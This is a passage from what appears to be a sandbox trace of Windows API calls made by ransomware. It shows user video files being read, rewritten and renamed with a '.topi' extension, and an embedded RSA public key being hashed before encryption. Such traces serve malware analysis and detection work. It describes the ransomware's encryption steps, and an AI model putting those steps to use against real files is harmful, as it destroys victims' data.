[0097.809] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fe8 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4fd0 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.810] GetCurrentThreadId () returned 0x8c4 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa340 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.810] GetCurrentThreadId () returned 0x8c4 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5000 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb9f8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.814] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1892c, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1892c, lpOverlapped=0x0) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.814] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18931, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.814] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.815] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.815] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.815] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.815] CloseHandle (hObject=0x6a8) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0097.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.825] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\2zz49h7Y1j.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\2zz49h7y1j.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\2zz49h7Y1j.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\2zz49h7y1j.avi.topi")) returned 1 [0097.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.825] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.827] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b1b39a0, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0xc8d11b90, ftLastAccessTime.dwHighDateTime=0x1d5beab, ftLastWriteTime.dwLowDateTime=0xc8d11b90, ftLastWriteTime.dwHighDateTime=0x1d5beab, nFileSizeHigh=0x0, nFileSizeLow=0x124eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cas9.flv", cAlternateFileName="")) returned 1 [0097.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f248 [0097.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f248 | out: hHeap=0x680000) returned 1 [0097.827] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Cas9.flv") returned=".flv" [0097.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Cas9.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\cas9.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.827] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=74987) returned 1 [0097.827] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.830] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x124c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.830] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.831] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.831] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x124eb, lpOverlapped=0x0) returned 1 [0097.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.832] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.833] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.833] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.833] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.833] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.833] GetLastError () returned 0x0 [0097.833] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.833] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.833] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.833] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.833] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x124f0) returned 0x9a06a00 [0097.834] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.834] HeapFree (in: hHeap=0x680000, 